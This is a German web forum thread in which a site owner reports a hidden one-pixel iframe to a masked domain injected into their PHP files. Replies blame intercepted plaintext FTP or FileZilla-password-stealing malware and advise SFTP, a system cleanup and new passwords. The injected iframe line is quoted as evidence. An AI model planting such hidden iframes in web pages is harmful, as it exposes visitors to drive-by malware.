You are not logged in.

  • Login

1

Thursday, February 2nd 2012, 6:25pm

Was meint ihr dazu? ...com/stata.html

Hey leute!

Ich habe bei meinem kostenlosen Webhoster (bplaced.net) folgendes Problem:

Nur in meinen PHP Dateien ist folgender HTML code:

HTML Code

1
<iframe src=http://*****.com/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

Das HTML ist auch nicht das beste!
Ich habe schon bplaced.net angeschrieben, ob die diesen (ich denke das soll werbung sein) code eingebettet haben könnten.

Sie meinten, dass sie es nicht wahren.
Ich habe auch ein 24 Stelliges FTP Passwort und ich habe es nicht weitergegeben!
Was meint ihr dazu?

// Link entfernt - by vince

2

Thursday, February 2nd 2012, 7:37pm

Da es ein Freehoster ist, hast du wahrscheinlich keinen Zugriff auf die Logdateien? ansonsten, ist es ja kein Problem im Zweifel zu wechseln.

3

Thursday, February 2nd 2012, 8:45pm

Wenn man davon ausgeht, das bplaced.net die Wahrheit sagt, dann könnte es sein, dass jemand ausgenutzt hat, dass das FTP-Protokoll nicht verschlüsselt ist. Dein Passwort wird also in reinem Text durch das Netzt geschickt. Mit SFTP (FTP durch einen SSH-Tunnel) kann man das vermeiden. Vorausgesetzt der Hoster unterstützt das.
Wenn du natürlich einen Trojaner auf deinem PC hast, der die Passwörter ausspäht, dann nützt dir das alles nix.

4

Thursday, February 2nd 2012, 8:46pm

Ja das stimmt leider!
Da der volle url nicht angezeigt wird hier ist er:

Source code

1
http://****.com/stata.html



// Link entfernt - by vince

Gast

Unregistered

5

Friday, February 3rd 2012, 12:00pm

Virus

Es ist ein Virus, der scheinbar die Passworte von FileZilla ausliest.

Also am besten erstmal den eigenen Rechner mit einem Antivirusprogramm bereinigen oder besser noch ganz aufsetzen und dann alle FTP-Passworte ändern.

Similar threads

Social bookmarks